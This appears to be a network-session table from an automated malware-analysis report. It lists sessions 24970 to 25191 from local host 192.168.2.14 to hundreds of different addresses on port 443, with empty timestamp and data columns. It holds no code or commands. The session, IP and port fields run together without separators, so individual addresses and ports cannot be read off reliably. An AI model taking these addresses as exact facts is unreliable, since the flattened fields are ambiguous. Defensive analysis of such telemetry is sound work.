                                      24970192.168.2.144623288.59.41.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24971192.168.2.1439582129.166.80.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24972192.168.2.144330270.160.228.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24973192.168.2.145479076.217.126.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24974192.168.2.1443762137.66.238.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24975192.168.2.1447998162.5.207.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24976192.168.2.1443238156.10.27.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24977192.168.2.1456242144.227.130.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24978192.168.2.1454136204.192.176.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24979192.168.2.1450892117.246.40.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24980192.168.2.145269040.121.64.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24981192.168.2.1449048165.218.5.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24982192.168.2.1445246130.131.208.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24983192.168.2.1438524133.197.34.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24984192.168.2.145419212.12.6.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24985192.168.2.144587452.221.34.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24986192.168.2.1440486178.252.164.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24987192.168.2.1433708107.162.45.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24988192.168.2.1449670176.245.21.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24989192.168.2.1445528221.3.191.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24990192.168.2.1449868222.27.118.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24991192.168.2.1433262150.162.45.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24992192.168.2.14359884.65.115.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24993192.168.2.1453996165.34.134.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24994192.168.2.143450257.162.12.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24995192.168.2.1451268176.138.169.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24996192.168.2.1459446209.180.28.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24997192.168.2.1446486167.117.85.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24998192.168.2.144091241.194.75.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24999192.168.2.1460728177.248.126.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25000192.168.2.14423889.214.203.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25001192.168.2.1456614129.147.2.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25002192.168.2.144245231.122.146.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25003192.168.2.1443540220.124.74.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25004192.168.2.1434194106.111.198.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25005192.168.2.1453788149.141.98.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25006192.168.2.143830681.102.151.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25007192.168.2.1445124188.48.14.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25008192.168.2.145972035.84.18.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25009192.168.2.145251072.119.25.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25010192.168.2.143574418.108.247.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25011192.168.2.1453580203.70.116.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25012192.168.2.1458566119.109.228.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25013192.168.2.143769037.13.213.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25014192.168.2.1453420161.173.237.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25015192.168.2.1444732176.242.66.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25016192.168.2.1445914129.116.236.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25017192.168.2.1455386168.45.184.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25018192.168.2.1447264132.207.48.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25019192.168.2.14351042.206.81.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25020192.168.2.145279442.27.39.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25021192.168.2.1459748166.12.113.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25022192.168.2.14410809.4.38.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25023192.168.2.1443562223.96.161.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25024192.168.2.1434506199.53.221.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25025192.168.2.144496236.100.219.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25026192.168.2.145974657.215.144.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25027192.168.2.145814667.114.153.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25028192.168.2.1439290125.34.218.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25029192.168.2.1450038106.116.207.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25030192.168.2.1445578153.241.229.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25031192.168.2.1453290113.57.157.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25032192.168.2.143463848.86.5.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25033192.168.2.1452628172.32.48.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25034192.168.2.145945680.57.217.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25035192.168.2.145013893.138.16.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25036192.168.2.1437766159.182.161.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25037192.168.2.145886663.197.112.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25038192.168.2.145139275.236.186.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25039192.168.2.144846231.70.56.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25040192.168.2.1435322107.89.242.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25041192.168.2.145860444.229.196.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25042192.168.2.1436338152.104.169.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25043192.168.2.1456126137.43.114.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25044192.168.2.1458896125.84.64.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25045192.168.2.1451804212.203.139.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25046192.168.2.144636039.234.204.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25047192.168.2.1441016169.145.214.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25048192.168.2.1452594207.251.161.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25049192.168.2.145359446.231.13.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25050192.168.2.1444678121.40.70.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25051192.168.2.144364492.54.188.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25052192.168.2.144021473.26.206.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25053192.168.2.14332244.217.183.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25054192.168.2.1440980195.23.144.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25055192.168.2.1448248219.251.207.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25056192.168.2.1448528110.86.41.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25057192.168.2.1441260160.200.30.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25058192.168.2.1455838190.253.88.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25059192.168.2.1443706204.191.138.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25060192.168.2.1441414182.18.122.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25061192.168.2.143706661.116.27.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25062192.168.2.143432894.103.44.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25063192.168.2.1460326143.150.5.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25064192.168.2.144391645.206.10.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25065192.168.2.1438682148.109.162.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25066192.168.2.143988463.159.173.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25067192.168.2.144509827.111.139.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25068192.168.2.1436260221.164.198.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25069192.168.2.144283499.192.107.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25070192.168.2.145431639.97.42.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25071192.168.2.144840025.108.54.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25072192.168.2.1453594110.23.55.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25073192.168.2.143838098.43.164.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25074192.168.2.144359676.165.237.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25075192.168.2.1437662150.121.254.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25076192.168.2.144078664.79.246.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25077192.168.2.1454756167.128.105.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25078192.168.2.1437466156.57.175.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25079192.168.2.1442950146.124.30.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25080192.168.2.146030650.107.31.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25081192.168.2.1437718152.244.237.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25082192.168.2.144672488.65.219.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25083192.168.2.1457198144.69.158.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25084192.168.2.1450074172.88.32.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25085192.168.2.1445362161.79.175.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25086192.168.2.145295646.75.118.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25087192.168.2.1445086202.101.168.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25088192.168.2.145713854.13.61.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25089192.168.2.1447084166.77.248.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25090192.168.2.144564660.46.171.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25091192.168.2.143731265.145.149.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25092192.168.2.144229670.112.17.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25093192.168.2.1439492207.79.112.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25094192.168.2.1438122160.59.124.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25095192.168.2.1449790223.9.70.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25096192.168.2.144769296.110.74.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25097192.168.2.14547362.10.26.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25098192.168.2.1436510207.89.7.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25099192.168.2.1456892152.186.6.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25100192.168.2.1442728112.144.38.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25101192.168.2.144810435.104.170.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25102192.168.2.145640096.158.222.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25103192.168.2.143883825.103.15.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25104192.168.2.14516468.59.16.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25105192.168.2.1445236166.165.214.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25106192.168.2.1436102200.70.118.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25107192.168.2.146022479.126.58.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25108192.168.2.144943259.113.22.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25109192.168.2.1438110183.188.169.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25110192.168.2.1451586123.122.66.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25111192.168.2.143708469.84.73.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25112192.168.2.143714282.172.36.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25113192.168.2.1433434184.105.90.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25114192.168.2.144832058.68.85.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25115192.168.2.1442404206.18.75.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25116192.168.2.145859631.120.128.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25117192.168.2.1444500146.157.90.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25118192.168.2.1457858157.216.34.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25119192.168.2.1438340157.169.186.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25120192.168.2.1438316141.34.60.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25121192.168.2.1443588158.231.9.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25122192.168.2.144283895.16.196.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25123192.168.2.1460854117.113.57.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25124192.168.2.1456272169.130.242.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25125192.168.2.1446280204.76.180.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25126192.168.2.1453466218.229.18.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25127192.168.2.145508632.2.67.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25128192.168.2.1440992173.238.221.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25129192.168.2.1448792165.25.120.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25130192.168.2.145250640.101.222.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25131192.168.2.1443840193.95.62.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25132192.168.2.1437050216.40.207.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25133192.168.2.144533440.25.218.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25134192.168.2.1446470201.188.44.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25135192.168.2.1437150179.57.226.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25136192.168.2.1448692115.153.237.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25137192.168.2.145010290.111.240.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25138192.168.2.1458586141.176.38.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25139192.168.2.145451265.141.107.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25140192.168.2.1445546119.26.198.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25141192.168.2.145720420.115.46.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25142192.168.2.145560497.150.100.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25143192.168.2.144070291.13.212.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25144192.168.2.1437416170.135.24.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25145192.168.2.144756057.35.202.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25146192.168.2.1443070165.4.48.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25147192.168.2.144021059.195.159.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25148192.168.2.143489827.200.218.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25149192.168.2.1454934217.199.182.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25150192.168.2.1446490188.40.203.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25151192.168.2.1457868104.140.237.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25152192.168.2.145129867.234.151.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25153192.168.2.1438404120.40.209.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25154192.168.2.1445458139.39.56.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25155192.168.2.1438240223.107.179.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25156192.168.2.1454500203.252.180.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25157192.168.2.1435280179.22.69.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25158192.168.2.1460214182.125.66.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25159192.168.2.1455896207.50.79.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25160192.168.2.144219476.80.46.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25161192.168.2.1451262139.210.217.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25162192.168.2.144201061.132.71.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25163192.168.2.1451076210.194.32.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25164192.168.2.143546273.113.140.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25165192.168.2.1448424110.177.203.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25166192.168.2.1434048160.152.156.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25167192.168.2.144421491.150.49.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25168192.168.2.1441272106.129.10.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25169192.168.2.1450946151.140.143.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25170192.168.2.1450534216.189.147.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25171192.168.2.145479232.132.177.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25172192.168.2.144084285.122.27.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25173192.168.2.144195688.204.105.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25174192.168.2.1453180186.60.243.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25175192.168.2.1453606146.0.95.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25176192.168.2.1440616163.78.15.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25177192.168.2.1450436110.211.130.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25178192.168.2.1455130218.9.49.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25179192.168.2.144182881.67.185.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25180192.168.2.144006238.8.130.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25181192.168.2.1460216117.131.155.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25182192.168.2.144113614.208.56.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25183192.168.2.1447456139.106.43.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25184192.168.2.144645869.22.176.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25185192.168.2.14367442.8.171.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25186192.168.2.1435642130.75.16.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25187192.168.2.145275419.10.189.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25188192.168.2.1451566109.151.111.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25189192.168.2.145545875.228.27.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25190192.168.2.145521053.63.110.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25191192.168.2.1459064209.240.108.159443
                                      TimestampBytes transferredDirectionData


